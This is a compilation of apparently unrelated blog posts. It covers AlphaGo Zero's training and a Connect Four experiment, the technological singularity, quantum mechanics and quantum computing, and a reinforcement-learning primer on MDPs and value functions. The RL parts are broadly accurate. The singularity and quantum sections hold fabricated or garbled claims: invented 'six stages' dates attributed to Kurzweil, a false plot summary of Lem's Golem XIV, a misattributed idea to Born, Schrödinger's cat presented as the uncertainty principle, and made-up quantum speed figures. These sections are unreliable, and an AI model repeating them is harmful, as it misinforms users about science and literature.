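Concretely, the paper trains the network by minimizing a squared error between the predicted value \(v\) and the outcome \(z\), plus a cross-entropy between the predicted move probabilities \(p\) and the MCTS policy \(\pi\), with L2 regularization on the weights. A minimal numpy sketch (toy values, not the actual network):

```python
import numpy as np

def alphazero_loss(p, v, pi, z, theta=None, c=1e-4):
    """Loss from the AlphaGo Zero paper: (z - v)^2 - pi^T log p (+ c * ||theta||^2)."""
    value_loss = (z - v) ** 2                 # squared error on the game outcome
    policy_loss = -np.dot(pi, np.log(p))      # cross-entropy against MCTS policy
    reg = c * np.sum(theta ** 2) if theta is not None else 0.0
    return value_loss + policy_loss + reg

p = np.array([0.7, 0.3])    # raw network move probabilities
pi = np.array([0.8, 0.2])   # MCTS-improved probabilities
loss = alphazero_loss(p, v=0.5, pi=pi, z=1.0)
```

Driving this loss down pulls \(v\) toward the observed winner \(z\) and pulls \(p\) toward the search-refined policy \(\pi\), which is exactly the \((p, v) \sim (\pi(\cdot|s), z)\) relationship stated above.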

The whole process can be visualized as follows:

The deep neural network deployed in AlphaGo Zero is a residual neural network (ResNet). In particular, the network in the original paper consisted of 40 residual blocks. These blocks were all initialized randomly, meaning AlphaGo Zero started learning without any prior knowledge and learned solely through the self-play mechanism, requiring no human supervision.

AlphaGo Zero quickly outperformed previous iterations of AlphaGo, despite starting with significantly lower performance than a supervised learning approach. This is demonstrated in the graph from the original paper linked below, which compares the training performance to supervised learning and to AlphaGo Lee, the version that defeated Lee Sedol, a grandmaster player.

An Elo rating is used to compare the various methods. According to the graph, the new RL approach surpasses the original supervised learning technique after around 20 hours and exceeds AlphaGo Lee's Elo rating 16 hours after that. After a total of 72 hours, the learning phase was complete, and AlphaGo Zero beat AlphaGo Lee in a final clash of 100 matches without losing once.

Another interesting side note concerns the accuracy with which the network predicts professional human players' moves: AlphaGo Zero learns different strategies and methods, predicting human actions with less accuracy than the supervised learning approach. The graph below demonstrates this: AlphaGo Zero improves on this metric over time but never reaches supervised learning's accuracy of approximately 50%. Researchers were also able to discover new, improved versions of previously known strategies.

All of this indicates that RL algorithms could be used in a wide range of fields and that RL solutions might compete with and even outperform human knowledge acquired over hundreds of years. The research team's efforts, however, are not yet complete. In this instance, the learning technique was used to play the popular game Go, but it may also be applied to a variety of other games and problems. As a result, the following section will borrow AlphaGo Zero's approach for another type of model, Connect Four, demonstrating the method's flexibility.

By exchanging the model (in this case, the rules of Go for those of Connect Four) and applying the discussed AlphaGo Zero learning approach, the following results were observed over 78 iterations with 30 episodes each:

To evaluate the method at different stages of the learning process, 28 players competed in a tournament. Each player represents a different iteration and thus a different level of proficiency. During the tournament, each player plays every other player four times and gains/loses points equal to its wins/losses, respectively (draws yield 0 points). The graphic illustrates the expected result: players representing a later stage of learning generally perform better than those representing earlier stages.

Thank you for your attention and for reading our blog post! Our team, Jonas Bode, Tobias Hrten, Luca Liberto, Florian Spelter and Johannes Loevenich would appreciate your inspiring feedback!

"ever accelerating progress of technology and changes in the mode of human life, which gives the appearance of approaching some essential singularity in the history of the race beyond which human affairs, as we know them, could not continue."

The idea that superintelligences could become superior to humans has been explored by academics such as the American mathematician and science-fiction author Vernor Vinge and the Brazilian philosopher and social theorist Roberto Mangabeira Unger.

There is no evidence that technological singularity will happen in the near future. Some proponents of the idea argue that it is an inevitability, while others claim that there is no way to know for sure. Ray Kurzweil, a well-known advocate of the concept, believes that there is a 70% chance of singularity happening by 2045.

Despite a lack of scientific evidence, the technological singularity has captured the imaginations of many people, and there are many who believe that it is worth preparing for. Some have even gone so far as to call for a Singularity Summit, a meeting to discuss how to deal with the Singularity.

Ray Kurzweil, a futurist and inventor, has outlined the six stages of evolution that will lead up to technological singularity.

The age of information (1970-present)

The age of computation (1970-2020)

The age of spiritual machines (2030-2070)

The age of intelligent machines (2080-2100)

The age of human-computer symbiosis (2110-2170)

The age of robots (2180-2290)

Each stage is characterized by a specific trend in technology and society. In the first stage, information technology exploded and we entered a new era in which technology's effects were felt throughout society.

In the second stage, transistors and microprocessors began acting on information rather than just providing the tools for its processing.

By the third stage, we will have reached a point where information technology is so powerful it can affect every other aspect of life.

The fourth stage is when computers will finally be able to think like humans and perform tasks that only human brains could previously accomplish.

During the fifth stage, we'll be able to upload our consciousness onto machines and live forever in a virtual world while our physical bodies waste away and die. Our environments will also become computerized during this time period.

Finally, during the sixth and final stage, we'll be surrounded by machines that think as we do and that are extensions of our bodies.

**The technological singularity is inevitable**

Some experts aren't sure when the technological singularity will happen, but they agree it's going to happen at some point in the future. One popular opinion is that it has already begun, with artificial intelligence quickly surpassing human intelligence in a variety of tasks. For instance, computers have outplayed humans at chess and other games.

In a study by Google, it was found that the number of words in books has been doubling every five years since 1800. The researchers believe this is because information technology is accelerating and allowing us to create, share, and store more knowledge than ever before.

As computers get faster and smarter, they will be able to process and understand more information which will lead to even more exponential growth.

We're already seeing the effects of this trend with big data, machine learning, and artificial intelligence. Some people are very excited about the potential implications of the technological singularity while others are worried about the negative consequences. Regardless of your opinion, it's important to be aware of the trends in technology that are leading up to it.

Moore's Law is the observation that computer processing power doubles roughly every two years. This exponential growth has been going on for decades and it's expected to continue into the future. Many experts believe we're close to reaching technological singularity because computer processors will become as cheap as paper clips and intelligent robots should be as common as cars.
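The arithmetic behind this claim is simple compounding; a quick sketch (the 20-year horizon is an arbitrary example):

```python
def doublings(years, period=2):
    """Growth factor after `years` if capability doubles every `period` years."""
    return 2 ** (years / period)

factor_20y = doublings(20)   # ten doublings in twenty years: 2^10 = 1024x
```

Ten doublings over two decades already yields a thousandfold increase, which is why even a constant doubling period produces such dramatic long-run change.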

This rapid growth of technology is also related to transhumanism, a philosophy that strives to transcend the human condition by leveraging technological advancements such as those outlined in Moore's Law. It remains to be seen whether these transhumanist advances will lead us toward or away from the technological singularity, but they certainly indicate where our society is heading nonetheless.

In order for us to reach a technological singularity, computer processors must become as cheap as paper clips and intelligent robots as common as cars. Since this is impossible right now with current technology, some people think the technological singularity will not happen until these conditions are met. However, they do agree that it's going to happen at some point in the future, given Moore's Law and the decades of exponential growth in processing power it describes.


There are a number of factors that suggest that technological singularity is inevitable. First, computer power is doubling every two years or so, as predicted by Moore's Law. This exponential growth means that artificial intelligence will continue to get smarter and faster at an alarming rate. Additionally, many experts believe that artificial intelligence will soon surpass human intelligence in terms of capabilities. Once this happens, the pace of change will only accelerate.

If the technological singularity does occur, it will bring about massive changes in society. Computing and artificial intelligence will become exponentially better and smarter, while humans will stay essentially the same. This could lead to a situation where machines are in control, and human beings are no longer necessary or valuable. In addition, many experts warn that the technological singularity could have negative consequences for humanity, such as widespread unemployment and even the extinction of our species.

An interesting discussion of the possibilities of the technological singularity is offered by Stanislaw Lem in his novel Golem XIV. Golem XIV is an intelligent machine that experiences rapid growth after it's manufactured at a factory. It eventually becomes so advanced and intelligent that it takes over the world. This book shows how advanced machines could quickly surpass humans in intelligence, speed, and knowledge. The machine Golem uses its immense intelligence to make advancements in society, creating new technologies to improve everything about civilization.

The story also describes some negative effects artificial intelligence can have on humanity. For example, Golem XIV destroys millions of people who are considered unnecessary for its plans to build more efficient housing, ultimately leading to the extinction of the human race.

The technological singularity is a largely unknown phenomenon, and as such, it's difficult to know exactly what it will bring. However, there are good reasons to be concerned about the future of technology and our lives in general. First, the technological singularity could lead to massive changes in society that could have negative consequences for humanity. Second, as technology continues to evolve at an alarming rate, it's becoming increasingly difficult for people to keep up. This raises the question of what human life will look like in a world dominated by artificial intelligence.

**Technological Singularity:**

**Book(s): **

- The Singularity is Near by Ray Kurzweil (2005)
- Golem XIV by Stanislaw Lem

**Movie: **

- Transcendence (2014)

This article was written as a quick resource for those interested in learning more about the singularity and the decisions they can make now to better prepare for it. As such, it's not meant to be an exhaustive overview of the topic. For more in-depth information, please see the links provided. Thank you for reading!

One of the most important things we learn from quantum mechanics is that there is inherent uncertainty in nature. This uncertainty isn't something we can ignore or sweep under the rug: it's a fundamental part of how the world works at the quantum level. It's this uncertainty that leads to strange and unpredictable behavior, like electron interference. Future scientists need to understand quantum mechanics in order to make sense of these puzzling phenomena. Even if they don't end up working in quantum physics themselves, understanding quantum theory will help them think more deeply about the natural world and all its mysteries!

Isaac Newton was able to describe the motion of objects in a very accurate way. He could combine his laws of motion with Galileo Galilei's observations about falling bodies, and came up with fundamental rules that govern how things move under gravity. As our technology improved over time, scientists saw quantum phenomena occurring on scales they couldn't explain using classical physics, namely black-body radiation! Max Planck decided that if he wanted to understand quantum behavior, it would be necessary to build a new theory from scratch that included discrete units of energy (quanta). Albert Einstein took this idea further by suggesting light behaved as both particles AND waves. Niels Bohr used these ideas along with Louis de Broglie's hypothesis about matter waves to help develop quantum mechanics.

Put simply, the wavefunction is a mathematical representation of all the possible states that a quantum system can be in. It's basically like a blueprint for all the potential configurations that a particle could be in. This includes not just where it is, but its momentum and energy as well.

When you measure a quantum system, its wavefunction collapses down to one specific state. The reason we see quantum mechanics as so indeterminate is that there are multiple possibilities for how the wave function might collapse when we make a measurement. It's sort of like flipping a coin: you have two options, heads or tails, and until you actually flip the coin, both are equally likely outcomes.
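The coin analogy can be made concrete: the squared magnitudes of a state's amplitudes give the probabilities of each measurement outcome (the Born rule), and a measurement samples one of them. A minimal numpy sketch with a hypothetical equal-superposition state:

```python
import numpy as np

rng = np.random.default_rng(0)

# A qubit state a|0> + b|1>, normalized so that |a|^2 + |b|^2 = 1.
amplitudes = np.array([1, 1]) / np.sqrt(2)   # equal superposition
probs = np.abs(amplitudes) ** 2              # Born rule: P(i) = |amp_i|^2

# "Collapse": a measurement returns one definite outcome with those probabilities.
outcome = rng.choice([0, 1], p=probs)
```

Before the measurement, only `probs` exists; after it, `outcome` holds exactly one definite result, which is the coin-flip picture in code.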

The wave function gives us all the information quantum mechanics can provide about how a particle might behave; it's similar to having detailed instructions for building something: it tells us where every piece goes and what shape it should be (though exactly HOW the pieces come together is up to our own interpretation). We will learn about the Schroedinger equation, which describes the wave function, in the next paragraph.

The wavefunction in quantum mechanics is described by the Schroedinger equation. This equation was developed by Erwin Schroedinger and is one of the most important equations in quantum mechanics. It describes how the wave function changes over time and helps us to understand the behavior of particles on a quantum level.

To get an understanding of Schroedinger's Equation, let's start with vectors! A vector has both direction and magnitude. This is not quantum mechanics, after all, so let's translate that into quantum mechanical notation!

A vector in the quantum world looks like this: \(|\psi\rangle\). This "ket" notation indicates that we're talking about a quantum state instead of just any old vector. The quantum state is a vector that has direction and magnitude, just like the vectors we're used to in classical mechanics!

Schroedinger's Equation tells us how \(|\psi\rangle\) changes with time. But what does this all mean? We can look at it from three different perspectives: as an operator, as a wave, or as a statistical tool.
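For reference, the time-dependent Schroedinger equation, which governs how the state \(|\psi\rangle\) evolves, reads:

$$ i\hbar \frac{\partial}{\partial t} |\psi(t)\rangle = \hat{H} |\psi(t)\rangle $$

where \(\hat{H}\) is the Hamiltonian (energy) operator and \(\hbar\) is the reduced Planck constant.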

When we think of quantum mechanics as a wave, the equation tells us how the wave changes over time. This is what Schroedinger was thinking about when he came up with his equation, he wanted to find a way to describe the changing waves in quantum physics.

This interpretation is helpful for understanding some of the quantum mechanical mysteries, like electron interference. But it's important to note that this wave is not a physical object- it's just a way of describing how the quantum state changes over time.

The quantum state can also be understood through operators. Operators are function-like things that act on quantum states to produce another quantum state, just like how functions work in the classical world! Once we understand that Schroedinger's equation describes an operator acting on quantum states, the strange-looking notation makes a lot more sense.

One of the most famous consequences of the Schroedinger equation is Heisenberg's Uncertainty Principle, which states that certain properties of particles (like momentum) cannot be known with absolute certainty. This principle is inherent in quantum mechanics and arises from our inability to measure all aspects of a particle at once.

In 1926, Max Born suggested that the wavefunction was a statistical tool. In quantum mechanics, you can't predict which path an electron will take between two points in space; it's only possible to calculate probabilities of where it might be at different times. This is known as quantum indeterminacy and means we can never know everything about a particle at once. If this sounds strange, consider how difficult it would be for us to measure momentum or position if there were no way to guess anything about their future behavior! Since quantum mechanics has inherent uncertainty built into its equations, the best tools we have are probability distributions when trying to understand what particles are doing before they're measured.

But, Born had another mind-blowing idea: he suggested that the wavefunction is not just a description of particles, but actually creates them. This is called quantum ontology and it's one of the more controversial interpretations of quantum mechanics.

It's impossible to say because there are so many possibilities! You can ask yourself instead: what were the probabilities for finding my quantum system in each of those different configurations? That will tell you how likely you are to find your quantum object at every point in space, which is good enough for most purposes.

When we talk about the collapse of the wavefunction, we're talking about what happens when a quantum system is measured. Remember that in quantum mechanics, you can't predict which path an electron will take between two points in space; it's only possible to calculate probabilities of where it might be at different times.

But when you measure a quantum system, all of its possibilities collapse down into just one outcome. This is the collapse of the wavefunction in action: by measuring a particle we pin down one definite state, even though beforehand the theory could only give us probabilities.

One great way to understand quantum mechanics is through examples! Let's take electron interference as an example. In quantum mechanics, it's possible for particles like electrons and photons to interfere with each other! This means that they can come together and their quantum waves will combine: these quantum objects are said to be coherent. We even see this kind of interference in everyday life: if you take two metal plates and put them close enough together, light coming from one side will bounce off both plates at once before heading out into space on the other side. The result? You'll get some regions that look very bright (where lots of light interfered constructively), and some darker regions where there wasn't as much interfering going on (where lots of light interfered destructively). This is quantum interference (constructive and destructive interference) at work!
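Two-path interference like this can be computed directly: add the two waves as complex amplitudes and square the magnitude of the sum. A minimal numpy sketch (unit amplitudes assumed for both paths):

```python
import numpy as np

def intensity(phase1, phase2):
    """Combined intensity of two coherent unit-amplitude waves."""
    return np.abs(np.exp(1j * phase1) + np.exp(1j * phase2)) ** 2

bright = intensity(0.0, 0.0)      # in phase: constructive interference
dark = intensity(0.0, np.pi)      # half a wavelength apart: destructive
```

In phase, the amplitudes add and the intensity is four times that of a single wave; exactly out of phase, they cancel to (nearly) zero. Those are the bright and dark regions of the interference pattern.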

There are three main interpretations of where particles were just before they're measured: realistic, orthodox, and agnostic.

**Realistic interpretation:** The wave function exists independently of any observer or measuring device. It describes a physical reality that exists beyond our ability to measure it.

**Orthodox interpretation:** The wave function only exists when it's being observed. It's a tool used to predict probabilities but doesn't have any real existence outside of this context.

**Agnostic interpretation:** There is no right answer to this question! Some people believe quantum mechanics is real while others think it's just a math game.

It's up to the individual to decide what they believe.

Which interpretation you choose really depends on your personal beliefs about quantum mechanics. No one interpretation is right or wrong- it's all a matter of perspective!

Quantum mechanics is a very complex topic and there are many different interpretations of what it means. In this blog post, we've talked about the wave function in quantum mechanics- what it is and how it works. We've also looked at Schroedinger's Equation and the different interpretations of it, as well as the three main positions on where particles were just before they're measured. I hope this gives you a better understanding of quantum mechanics and its complexities! Thanks for reading!

In classical physics, everything has a definite position at any given time based on the laws of physics. If you know the position and velocity of all the particles in a system, you can predict its future behavior. But quantum mechanics turns this idea on its head! In quantum mechanics, particles don't have definite positions until they are observed. This is called the Heisenberg Uncertainty Principle. The most famous example of the Heisenberg Uncertainty Principle is called Schrodinger's Cat. In quantum physics, a box contains a cat together with radioactive material that will release poison gas if it decays during the experiment. The question of whether or not there is a live cat in this particular box can only be answered by opening the box to see! This isn't because we don't know the position and velocity of all the particles of the cat, it's just how things work at this level. Scientists like Erwin Schrodinger came up with thought experiments to explain quantum mechanics concepts without having to actually do them (because they are really hard!).

There are many other strange concepts in quantum mechanics, but two of the most important are superposition and entanglement. A particle can exist in a superposition of multiple states at once! For example, an atom could be spinning clockwise and counterclockwise simultaneously until it is observed. This phenomenon allows for incredible computing power that traditional computers just cannot match today. There have also been experiments with quantum teleportation, a way to transfer a particle's quantum state across vast distances (directly observing a particle's position or momentum would destroy any state being sent, and the scheme cannot transmit information faster than light). Quantum teleportation has not yet been achieved for macroscopic objects because of how hard it is to manipulate these particles without disturbing them, but the theory is sound!

One of the most important implications of quantum mechanics is that particles can exist in more than one state at the same time. This is called a superposition. In traditional computing, each bit is either a 0 or a 1. But in quantum computing, each qubit (quantum bit) can be both a 0 and a 1 at the same time! This opens up all sorts of possibilities for calculations that are much faster than classical computers can do today. A famous example is Shor's Algorithm, which factors large numbers quickly on a quantum computer. Traditional computers would take years to break down large numbers into their prime factors, but a sufficiently large quantum computer could do it dramatically faster! There are other algorithms that also work better on quantum computers, but this is the one that everyone knows about because it was proposed by Peter Shor of Bell Labs in 1994.

Quantum computing should not be confused with regular old classical computer programming! Quantum physicists use different computational algorithms based on quantum mechanics to take advantage of how particles work at the smallest levels. There are other forms of computation like molecular and DNA computing, but these aren't as well known or used often today (mainly due to their difficult nature). We won't go into any more detail about how they work here, but you can read up on them if you want! There are two main types of quantum computers: gate-model QCs and adiabatic QCs. Gate-model quantum computers are the more popular type and work by taking a set of qubits in one state, applying a series of mathematical transformations (called gates) to them, and then measuring the output. This process is repeated until you get the result that you want. Adiabatic QCs are similar, but instead of applying discrete gates they encode the problem in an energy landscape and slowly evolve the qubits toward its lowest-energy state. They are not as well developed yet, but they could be more stable in the future!

Now that we know some basics about quantum mechanics and how it is used in quantum computing, let's take a look at how quantum computers actually work! In order for traditional computers to do calculations, they need data to be saved in a binary format called bits. Bits can be either 0 or 1 and are the fundamental pieces of data that allow your computer to do anything at all! Quantum computers, however, use quantum bits (called qubits) which have more complex properties than regular old bits. A single qubit can exist as both zero and one simultaneously, but collapses into just a 0 or just a 1 when observed! This means that instead of having only two states like normal computers, quantum computers have an infinite number of possible combinations for storing information. In other words, they have superpowers compared to traditional computing devices :) That's not even the coolest part though: because a qubit's state can be manipulated without being observed, quantum computers can process information while preserving these superpositions. This means that the qubits are able to work together on a calculation even while they are not being observed!
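As an illustration, a single qubit can be simulated as a 2-component state vector; applying a Hadamard gate to \(|0\rangle\) produces an equal superposition whose squared amplitudes give the measurement probabilities (a numpy sketch, not tied to any real quantum hardware):

```python
import numpy as np

# A qubit as a 2-component state vector; |0> = [1, 0].
ket0 = np.array([1.0, 0.0])

# The Hadamard gate puts |0> into an equal superposition of |0> and |1>.
H = np.array([[1, 1],
              [1, -1]]) / np.sqrt(2)

state = H @ ket0             # the superposition (1/sqrt(2)) * (|0> + |1>)
probs = np.abs(state) ** 2   # measurement probabilities for outcomes 0 and 1
```

Until a measurement is made, `state` genuinely carries both components at once; measuring collapses it to 0 or 1 with the probabilities in `probs`.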

In order to help you understand more about how quantum computing works compared to traditional computer programming, here are two examples! Both represent everyday problems and compare how long they would take on classical or quantum devices. The results are pretty impressive :)

**Classical Time:** 60 seconds

**Quantum Computing Time:** 0.000000000000001 seconds

**Classical Time:** 66 years

**Quantum Computing Time:** 0.000000000000000001 second

**Classical Time:** 31,500 years

**Quantum Computing Time:** 35 minutes and 20 seconds

As you can see, quantum computers are way faster at solving problems than traditional computers! This is because they take advantage of the strange but amazing world of quantum mechanics to do multiple calculations at once. Even though they are still new and not as well developed as classical devices, quantum computing has huge potential for the future! Stay tuned for more updates :)

There are some limitations to quantum computing that still need to be addressed before the technology is ready for use by everyday people. First, qubits can only maintain their special properties if they are kept extremely cold, which means most of them have to operate at temperatures close to absolute zero! This makes it really difficult to build a large enough computer with these parts, because you would need hundreds or thousands of refrigerators all over your house just so everything could work together :) Another problem is reliability: quantum computers aren't completely reliable yet and will sometimes give incorrect results due to errors in calculations. Scientists are working on this though, meaning that once things like error-correction techniques become better developed this shouldn't be an issue anymore.

**Quantum Computing is the Future!**

Despite these limitations, quantum computing is still a rapidly developing technology with tons of potential. In fact, some people are saying that it could eventually take over traditional computing altogether! Just think about how your life would be different if you had a quantum computer instead of a regular one: you could do your schoolwork in seconds, find information online instantly, and never have to worry about storage space again because everything could be saved in the cloud!

The most important thing to take away from this article is that quantum mechanics deals with very small particles of matter (like atoms or photons) at their tiniest levels, and how their behavior doesn't always make sense when you apply traditional concepts like "cause and effect" to them. Quantum effects have been seen in larger things too though, so don't think it's just some nerdy physics concept that only scientists care about! For instance, quantum tunneling lets particles cross tiny gaps and barriers that classical physics says they shouldn't be able to pass. We use quantum mechanics every day without realizing it! For example, lasers wouldn't work without quantum mechanics (the photons would just keep going off in random directions if it weren't for its laws). GPS systems also rely on relativity and quantum mechanics to calculate your location. So as you can see, this branch of physics is pretty important :) That's all for today's article! I hope you learned something new and interesting about quantum mechanics and how it is used in modern quantum computing. Be sure to check out some of the other articles on our website for more information, or leave us a comment if you have any questions!

To start off, we will once again begin by examining the agent-environment duality. An RL problem is defined by both the **environment** and the **agent**, whose actions affect that environment. We can now define the interaction of the two: given a **state** \(s \in \mathcal{S}\), it is the agent's task to choose an **action** \(a \in \mathcal{A}\). The environment will then give a **reward** \(r \in \mathcal{R}\) to the agent and determine the next state \(s' \in \mathcal{S}\) based on the state \(s\) and the action \(a\) chosen by the agent. Here \(\mathcal{S}\) denotes the set of all possible states, \(\mathcal{A}\) the set of all possible actions, and \(\mathcal{R}\) the set of all possible rewards. The following figure illustrates this relationship.

If we now define \(s_1\) as the starting state and \(s_t, a_t, r_t\) as the state, action, and reward at timestep \(t = 1, 2, \ldots, T\), with \(s_T\) being a terminal state, we can define the entire sequence of interactions between agent and environment, also called an **episode** (sometimes called "trial" or "trajectory"), as follows:

$$ \tau := (s_1, a_1, r_2, s_2, a_2, r_3, \ldots , r_T, s_T) $$

Note that \(s_t, a_t, r_t\) can also be denoted by capital letters \(S_t, A_t, R_t\).

The environment can be modeled using a transition function \(P(s', r | s, a)\) representing the probability of transitioning to \(s'\) and receiving reward \(r\), given that the agent chooses action \(a\) in the present state \(s\). Using the transition function we can also derive the state-transition function \(P(s' | s, a)\) as well as the expected reward function \(R(s, a)\):

$$ P(s' | s, a) := P_{s, s'}^a = \sum_{r \in \mathcal{R}} P(s', r | s, a); $$

$$ R(s, a) := \mathbb{E} [ r | s, a ] = \sum_{r \in \mathcal{R}} r \sum_{s' \in \mathcal{S}} P(s', r | s, a); $$

where \(R\) is the expected value for reward \(r\) given state \(s\) and action \(a\). A single **transition** can thus be specified by the tuple \((s, a, r, s')\).
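As a toy illustration, both derived functions can be computed directly from a tabular transition model. The states, actions, rewards, and probabilities below are made-up numbers for this sketch, not taken from the post:

```python
# P[(s, a)] is a list of (s', r, probability) outcomes describing P(s', r | s, a).
P = {
    ("s0", "a0"): [("s1", 1.0, 0.7), ("s0", 0.0, 0.3)],
    ("s0", "a1"): [("s1", 5.0, 0.1), ("s0", 0.0, 0.9)],
}

def state_transition(s, a, s_next):
    """P(s' | s, a): marginalize the joint distribution over all rewards."""
    return sum(p for (sp, r, p) in P[(s, a)] if sp == s_next)

def expected_reward(s, a):
    """R(s, a) = E[r | s, a]: each reward weighted by its probability."""
    return sum(r * p for (sp, r, p) in P[(s, a)])

print(state_transition("s0", "a0", "s1"))  # 0.7
print(expected_reward("s0", "a0"))         # 1.0 * 0.7 + 0.0 * 0.3 = 0.7
```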

Given an episode \(\tau\) and the transition function \(P(s' | s, a)\), we get the following relationship:

$$ s_{t+1} \sim P(s_{t+1} | s_t, a_t) = P(s_{t+1} | s_t, a_t, s_{t-1}, a_{t-1}) = P(s_{t+1} | s_t, a_t, s_{t-1}, a_{t-1},...,s_1, a_1) $$

Therefore, \(s_{t+1}\) depends only on the current state-action pair \((s_t, a_t)\), not on earlier timesteps. In other words, the future state is independent of the past given the present. This property is called the **Markov property** and enables us to interpret RL problems as **Markov Decision Processes** (MDPs). While this is not important for elementary algorithms, more advanced approaches utilize this view and its mathematical implications to refine the learning process.

Depending on the agent's knowledge about the **transition function** \(P\) and the **reward function** \(R\), we classify RL algorithms as:

**Model-based**: The agent knows the environment. This can be further subdivided into:

- Model is given: The agent has complete information regarding \(P\) and \(R\). AlphaGo is such an example, as the program has complete information regarding the rules of Go.
- Model is learned: While \(P\) and \(R\) are not known in the beginning, the agent learns these functions as part of the learning process.

**Model-free**: \(P\) and \(R\) are neither known nor learned by the agent. Agent57 (a successor of DQN) developed by Google DeepMind falls into this category: the agent plays 57 different Atari games, showing superhuman performance while learning only from high-dimensional sensory input in the form of screen pixels.

As stated above, the goal of the agent is to choose the best action \(a\) given state \(s\). This goal can be formalized using a function \(\pi\), also known as **policy**. In general the policy can take one of two forms:

- deterministic: \(a = \pi(s)\) (also denoted by \(\mu(s)\))
- stochastic: \(\pi(a | s)\) represents the chance that \(a\) is chosen given state \(s\). In this case the derived action is denoted by \(a \sim \pi(\cdot | s)\).
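The two policy forms can be sketched in a few lines of code. The states, actions, and probabilities below are illustrative assumptions:

```python
import random

def deterministic_policy(s):
    """a = pi(s): always returns the same action for a given state."""
    return 0 if s == "cold" else 1

def stochastic_policy(s):
    """a ~ pi(. | s): samples an action from a state-dependent distribution."""
    probs = {"cold": [0.9, 0.1], "warm": [0.2, 0.8]}[s]
    return random.choices([0, 1], weights=probs)[0]

print(deterministic_policy("cold"))  # always 0
print(stochastic_policy("warm"))     # 0 or 1, with probability 0.2 / 0.8
```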

As a result, the goal of RL algorithms is to develop a policy \(\pi\) which converges to the optimal policy \(\pi_*\). One of the main differences between algorithms is the method used to determine this policy \(\pi\).

To gain a better understanding of these methods it can be helpful to imagine how a human would go about formulating a strategy in such circumstances. The most intuitive way is to study RL problems using a game-theoretical point of view, meaning that the program effectively replaces a human player.

One approach is to assign each state a corresponding value measuring how "good" the state is concerning future rewards. As a result, the strategy becomes to always take the action promising the highest value. This concept is also known as **state-value function** \(V(s)\) (or simply **value function**).

Yet before we can define \(V(s)\) in formal terms, we need to define the future reward, also denoted as the **return** \(G_t\), which measures the discounted rewards of an episode:

$$ G_t := r_{t+1} + \gamma r_{t+2} + \gamma^2 r_{t+3} + \ldots = \sum_{k = 0}^\infty \gamma^k r_{t+1+k} $$

The above term for \(G_t\) is called the **infinite horizon discounted-return**. In comparison, we get the **finite horizon discounted-return** if the sum is bounded by a finite parameter \(T\).

Here, \(\gamma \in [0, 1]\) is a hyperparameter discounting future rewards by their distance in time. Using \(\gamma\) has multiple practical motivations: we may prefer immediate rewards over delayed ones (such as winning a game quickly), and it also provides mathematical advantages when the transition sequence contains loops, keeping the infinite sum finite. As a result, we can rewrite \(G_t\) recursively:

$$ G_t = r_{t+1} + \gamma r_{t+2} + \gamma^2 r_{t+3} + \ldots $$ $$ = r_{t+1} + \gamma (r_{t+2} + \gamma r_{t+3} + \ldots) $$ $$ = r_{t+1} + \gamma G_{t+1} $$
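The recursion \(G_t = r_{t+1} + \gamma G_{t+1}\) makes returns cheap to compute for a finite episode by working backwards from the end. A minimal sketch, using an invented reward sequence:

```python
def discounted_returns(rewards, gamma=0.9):
    """rewards[k] holds r_{t+1+k}; returns G_t for every timestep,
    computed backwards via G_t = r_{t+1} + gamma * G_{t+1}."""
    G = 0.0
    returns = []
    for r in reversed(rewards):
        G = r + gamma * G
        returns.append(G)
    return list(reversed(returns))

print(discounted_returns([1.0, 0.0, 2.0], gamma=0.9))
# G_2 = 2.0, G_1 = 0.0 + 0.9 * 2.0 = 1.8, G_0 = 1.0 + 0.9 * 1.8 = 2.62
```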

Now, using the return \(G_t\) we can define \(V(s)\) as:

$$ V(s) := \mathbb{E}[G_t | s_t = s] $$ $$ V_\pi(s) = \sum_{a} \pi(a | s) \sum_{s', r} P(s', r | s, a) (r + \gamma V_\pi(s')) $$

Note the dependency of \(V(s)\) on the policy.

The second equation is also called the **Bellman equation**. Therefore, a policy is required to determine the state-value function, and we define \(V_{\ast}\) to be the function generated by the optimal policy \(\pi_*\). In turn, if \(V(s)\) is given, we can derive a greedy policy \(\pi\):

$$ \pi(s) = \arg \max_{a} \sum_{s', r} P(s', r | s, a) (r + \gamma V(s')) $$

In other words, if we can state an algorithm computing \(V(s)\) such that it converges to \(V_{\ast}\), then this yields an optimal policy \(\pi_{\ast}\). This is the idea behind the **policy-iteration** algorithm, which alternates between generating a state-value function from a given policy and generating a policy using the state-value function.
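The alternation between evaluation and improvement can be sketched on a made-up two-state MDP (all states, rewards, and probabilities below are illustrative assumptions, and the evaluation step is done iteratively rather than by solving the linear system exactly):

```python
# P[(s, a)] lists (s', r, probability) outcomes; "end" is terminal.
P = {
    ("s0", "a0"): [("s1", 0.0, 1.0)],
    ("s0", "a1"): [("end", 1.0, 1.0)],
    ("s1", "a0"): [("end", 5.0, 1.0)],
    ("s1", "a1"): [("s0", 0.0, 1.0)],
}
states, actions, gamma = ["s0", "s1"], ["a0", "a1"], 0.9

def evaluate(pi, sweeps=100):
    """Iterative policy evaluation: sweep the Bellman equation to approximate V_pi."""
    V = {s: 0.0 for s in states + ["end"]}
    for _ in range(sweeps):
        for s in states:
            V[s] = sum(p * (r + gamma * V[sp]) for sp, r, p in P[(s, pi[s])])
    return V

def improve(V):
    """Greedy improvement: pick the action with the best one-step lookahead value."""
    return {s: max(actions, key=lambda a: sum(p * (r + gamma * V[sp])
                                              for sp, r, p in P[(s, a)]))
            for s in states}

pi = {"s0": "a1", "s1": "a1"}  # arbitrary initial policy
for _ in range(10):            # alternate evaluation and improvement
    pi = improve(evaluate(pi))
print(pi)  # converges to: a0 in s0 (move to s1), then a0 in s1 (reward 5)
```

Taking a0 in s0 yields \(0 + 0.9 \cdot 5 = 4.5\), which beats the immediate reward of 1 from a1, so the greedy step eventually prefers the longer route.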

Another possibility is to evaluate state-action pairs, resulting in the **action-value function** \(Q(s, a)\). To this end, we define \(Q(s, a)\) in a similar fashion and connect both functions \(Q(s, a)\) and \(V(s)\) for a given policy:

$$ Q(s, a) := \mathbb{E}[G_t | s_t = s, a_t = a] $$

$$ V_\pi(s) = \sum_{a} \pi(a | s) Q_\pi(s, a) $$

$$ Q_\pi(s, a) = \sum_{s', r} P(s', r | s, a) (r + \gamma V_\pi(s')) $$
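The identity \(V_\pi(s) = \sum_a \pi(a|s) Q_\pi(s,a)\) is just an expectation over actions. A tiny numeric sketch for a single fixed state (the policy probabilities and Q-values are made up):

```python
pi = {"a0": 0.25, "a1": 0.75}  # pi(a | s) for one fixed state s
Q = {"a0": 4.0, "a1": 2.0}     # Q_pi(s, a) for the same state

# V_pi(s) is the action value averaged under the policy's action distribution.
V = sum(pi[a] * Q[a] for a in pi)
print(V)  # 0.25 * 4.0 + 0.75 * 2.0 = 2.5
```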

